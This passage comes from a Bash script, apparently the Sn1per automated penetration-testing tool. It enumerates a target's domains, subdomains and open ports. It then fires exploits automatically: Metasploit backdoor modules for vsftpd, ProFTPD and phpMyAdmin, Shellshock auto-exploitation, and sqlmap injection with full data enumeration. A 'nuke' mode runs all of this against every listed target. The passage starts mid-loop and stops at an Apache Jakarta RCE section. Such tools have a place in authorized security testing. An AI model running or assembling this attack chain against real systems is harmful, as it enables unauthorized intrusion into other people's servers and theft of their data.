|
|
if [[ ${a:0:1} =~ $REGEX ]];
|
|
then
|
|
SCAN_TYPE="IP"
|
|
else
|
|
SCAN_TYPE="DOMAIN"
|
|
fi
|
|
|
|
if [ $SCAN_TYPE == "DOMAIN" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
|
|
whois $a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
|
|
theharvester -d $a -l 100 -b bing 2> /dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
|
|
dig -x $a
|
|
dnsenum $a
|
|
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
|
|
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
|
|
dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
|
|
echo ""
|
|
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
|
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
|
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
|
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
|
|
echo -e "$OKBLUE"
|
|
curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
|
|
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt"
|
|
cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null
|
|
cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null
|
|
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
|
|
rm -f /tmp/curl.out 2> /dev/null
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
|
|
for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
|
|
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
|
|
fi
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
|
|
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
|
|
|
|
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
|
|
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
|
|
|
|
if [ -z "$port_80" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f http://$a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb http://$a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
|
|
xsstracer $a 80
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg
|
|
fi
|
|
|
|
if [ -z "$port_443" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f https://$a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb https://$a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
|
|
xsstracer $a 443
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a
|
|
sslscan --no-failed $a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg
|
|
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg"
|
|
fi
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
done;
|
|
exit
|
|
fi
|
|
|
|
if [ "$MODE" = "fullportonly" ]; then
|
|
echo -e "$OKRED ___ ____ __ __ $RESET"
|
|
echo -e "$OKRED / _/_ __/ / /__ ___ ____/ /____ ___ / /_ __$RESET"
|
|
echo -e "$OKRED / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
|
|
echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/ \__/\___/_//_/_/\_, / $RESET"
|
|
echo -e "$OKRED /_/ /___/ $RESET"
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
|
|
if [ -z "$OPT1" ]; then
|
|
nmap -T4 -sV -O -v -p 1-65355 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
|
|
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
else
|
|
nmap -T4 -sV -O -v -p $OPT1 -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits]=------------------- -- +$RESET"
|
|
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
fi
|
|
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
|
|
exit
|
|
fi
|
|
|
|
if [ "$MODE" = "port" ]; then
|
|
if [ -z "$OPT1" ]; then
|
|
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
|
|
exit
|
|
fi
|
|
fi
|
|
|
|
if [ "$MODE" = "nuke" ]; then
|
|
if [ "$OPT1" = "report" ]; then
|
|
sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
|
exit
|
|
fi
|
|
for a in `cat $TARGET`; do
|
|
echo -e "$OKRED "
|
|
echo -e "$OKRED ____"
|
|
echo -e "$OKRED __,-~~/~ \`---."
|
|
echo -e "$OKRED _/_,---( , )"
|
|
echo -e "$OKRED __ / < / ) \___"
|
|
echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
|
|
echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
|
|
echo -e "$OKRED (_ ( \ ( > \)"
|
|
echo -e "$OKRED \_( _ < >_>'"
|
|
echo -e "$OKRED ~ \`-i' ::>|--\""
|
|
echo -e "$OKRED I;|.|.|"
|
|
echo -e "$OKRED <|i::|i|\`."
|
|
echo -e "$OKRED (\` ^''\`-' ')"
|
|
echo -e "$OKRED --------------------------------------------------------- $RESET"
|
|
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
|
|
sniper $a
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
done
|
|
exit
|
|
fi
|
|
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo -e "$RESET"
|
|
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
|
|
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
|
|
nslookup $TARGET
|
|
host $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET"
|
|
xprobe2 $TARGET
|
|
if [ $SCAN_TYPE == "DOMAIN" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
|
|
whois $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
|
|
theharvester -d $TARGET -l 100 -b bing 2> /dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
|
|
dig -x $TARGET
|
|
dnsenum $TARGET
|
|
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
|
|
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
|
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
|
echo ""
|
|
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
|
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
|
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
|
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
|
|
echo -e "$OKBLUE"
|
|
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
|
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
|
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
|
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
|
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
|
rm -f /tmp/curl.out 2> /dev/null
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
|
|
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
|
|
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
|
|
fi
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
|
|
ping -c 1 $TARGET
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
|
|
if [ -z "$OPT1" ]; then
|
|
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
elif [ "$OPT1" == "web" ]; then
|
|
nmap -sV -T5 -Pn -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
else
|
|
nmap -sS -T5 -Pn -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
|
|
nmap -sU -T5 -Pn -p U:$OPT1 --open $TARGET
|
|
fi
|
|
|
|
if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
|
|
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
|
|
port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_623=`grep 'portid="623"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_624=`grep 'portid="624"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
|
|
if [ -z "$port_21" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -sC -T5 -p 21 --script=ftp-* $TARGET
|
|
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_22" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
|
|
cd $PLUGINS_DIR/ssh-audit
|
|
python ssh-audit.py $TARGET:22
|
|
cd $INSTALL_DIR
|
|
nmap -A -sV -Pn -sC -T5 -p 22 --script=ssh-* $TARGET
|
|
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_23" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
|
|
echo ""
|
|
cisco-torch -A $TARGET
|
|
nmap -A -sV -Pn -T5 --script=telnet* -p 23 $TARGET
|
|
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_25" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=smtp* -p 25 $TARGET
|
|
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
|
|
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_53" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
|
|
nmap -A -sU -sV -Pn -T5 --script=dns* -p U:53,T:53 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_79" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=finger* -p 79 $TARGET
|
|
bin/fingertool.sh $TARGET $USER_FILE
|
|
fi
|
|
|
|
if [ -z "$port_80" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f http://$TARGET
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb http://$TARGET
|
|
xsstracer $TARGET 80
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET/robots.txt | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
|
|
curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
|
|
echo ""
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
|
|
nikto -h http://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
|
|
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
|
|
|
|
if [ "$MODE" = "web" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
|
|
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
|
|
dirb http://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
|
|
wpscan --url http://$TARGET --batch
|
|
echo ""
|
|
wpscan --url http://$TARGET/wordpress/ --batch
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
|
|
python $CMSMAP -t http://$TARGET
|
|
echo ""
|
|
python $CMSMAP -t http://$TARGET/wordpress/
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
|
|
mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
|
|
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
|
|
cd $INSTALL_DIR/loot/web/$TARGET-http/
|
|
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
|
|
unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
|
|
cd $INSTALL_DIR
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
|
|
sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
|
|
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
|
|
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
|
|
